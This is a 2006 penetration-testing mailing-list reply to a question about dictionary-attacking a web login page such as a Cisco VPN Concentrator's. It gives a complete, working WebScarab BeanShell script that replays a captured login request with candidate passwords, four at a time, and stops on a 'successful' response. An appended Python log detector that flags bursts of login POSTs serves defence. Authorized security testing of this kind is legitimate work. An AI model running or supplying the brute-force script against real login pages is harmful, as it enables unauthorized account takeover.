Network Security Pen-Test

Re: BruteForcing?

Subject: Re: BruteForcing?
Date: Wed, 18 Oct 2006 10:28:35 +0200
Troy Fletcher wrote:
Sparky,

For brute forcing WebPages, I use Perl scripts combined with Linux tools
like cURL and Wget. If you know any programming/scripting languages, I
can point you in the right direction. To help see the traffic exchange
for WebPage login attempts, I recommend using a proxy like WebScarab;
once you see the POSTs or GETs, automating attacks with cURL is easy. I
don't know any _good_ pre-made WebPage bruteforce tools, but I'm sure
that if someone else does, they'll share.

WebScarab can also be used to brute force web pages, using the Scripted plugin. One major advantage to using WebScarab is that your attack is/can be multi-threaded automatically: WebScarab will attempt up to 4 simultaneous requests.


Here is a simple script that uses an existing request as a template (for URLs, methods, headers, etc.) and just replaces the request body. In my example, I'll take words from a predefined array, but the technique can very easily be extended to reading lines from a file.

The script language is BeanShell, which is very similar to Java (BeanShell can evaluate actual Java classes in "strict" mode).

// check the source (or the appendix in the online help) for the
// methods you can use on Request and Response
import org.owasp.webscarab.model.Request;
import org.owasp.webscarab.model.Response;

// This function/method is the main loop.
// You need to provide three methods that this function will invoke
//
// boolean hasMoreRequests() - if there are more requests to issue
// Request getNextRequest()  - the next request to submit
// void handleResponse(Response response) - allows you to do something
//                             with the responses obtained
//
void fetchParallel() {
    // while we have more requests to submit, or we are busy processing
    // the last requests sent off/waiting for a response
    while (hasMoreRequests() || scripted.isAsyncBusy()) {
        // while there are fewer than 4 outstanding requests
        // and we have more to try
        while (scripted.hasAsyncCapacity() && hasMoreRequests()) {
            scripted.submitAsyncRequest(getNextRequest());
        }
        // if there is a response waiting to be processed
        if (scripted.hasAsyncResponse()) {
            while (scripted.hasAsyncResponse()) {
                handleResponse(scripted.getAsyncResponse());
            }
        } else Thread.sleep(100);
    }
}

String[] words = new String[] {"word1", "word2", "word3", "word4"};
int nextWord = 0;
boolean stop = false;
// This gets a copy of the request with ID 53, from the past
// conversations. Adjust to suit your particular situation.
Request template = scripted.getRequest(53);

boolean hasMoreRequests() {
    // keep going while words remain AND a hit has not yet been found;
    // once stop is set, getNextRequest() must not be called again
    return nextWord < words.length && !stop;
}

Request getNextRequest() {
    Request req = new Request(template); // make a copy
    String word = words[nextWord++]; // increment the counter
    out.println("Trying " + word);
    // Note that the content is always a byte array
    // you might also want to consider URLEncoding your words?
    // Also note that IF there is an existing Content-Length header
    // it will automatically be updated to match the length of the
    // content
    req.setContent(("username=joe&password=" + word).getBytes());
    return req;
}

void handleResponse(Response response) {
    byte[] content = response.getContent();
    if (response.getStatus().equals("200") && content != null) {
        String html = new String(content); // consider encoding?
        if (html.indexOf("successful")>-1) {
            // we're in! Save it for review
            scripted.addConversation(response);
            stop = true;
        }
    }
}

// start the main loop
fetchParallel();



-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] On Behalf Of 09sparky@gmail.com
Sent: Sunday, October 15, 2006 12:03 PM
To: pen-test@securityfocus.com
Subject: BruteForcing?


This is more of a general brute forcing question, but one with which I could use some assistance.

[snip]
Second question: Brute forcing also, but against WebPages.  For example,
a Cisco 3000 VPN Concentrator, I have the webpage asking for
username/password.  How would I attempt to dictionary attack this?

Thanks,
Sparky
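As an added example that is not part of this thread, here is the defender's view of the technique discussed above: a Python detector that flags a source address posting to a login form in bursts, the footprint a parallel guesser such as the 4-request WebScarab loop leaves in a web server's access log. The combined log format, the /login path, the 5-attempts-per-60-seconds threshold and the sample lines (RFC 5737 test addresses) are all constructed assumptions, not data from the thread.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" format; only the fields the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    # Returns a dict of fields, or None for a line that is not an access-log entry.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def detect_login_bursts(lines, login_path="/login", threshold=5, window_s=60):
    """Return {ip: peak_count} for sources that POST to login_path at least
    `threshold` times inside any `window_s`-second sliding window. Every POST
    counts regardless of status: a failed guess may well come back as HTTP 200
    with an error page. Lines are assumed to be in chronological order."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()           # drop attempts that fell out of the window
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged

# Constructed sample log (RFC 5737 test addresses), not captured data: one
# normal login, then four POSTs per second from one source, the shape a
# four-thread parallel guesser produces.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Oct/2006:10:28:01 +0200] "GET /login HTTP/1.1" 200 1532',
    '198.51.100.7 - - [18/Oct/2006:10:28:09 +0200] "POST /login HTTP/1.1" 302 0',
] + [
    f'203.0.113.5 - - [18/Oct/2006:10:28:{30 + i // 4:02d} +0200] '
    f'"POST /login HTTP/1.1" 200 2048' for i in range(8)
]
```

Run `detect_login_bursts(SAMPLE_LOG)` to get `{'203.0.113.5': 8}`; the single legitimate login from 198.51.100.7 is not reported.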


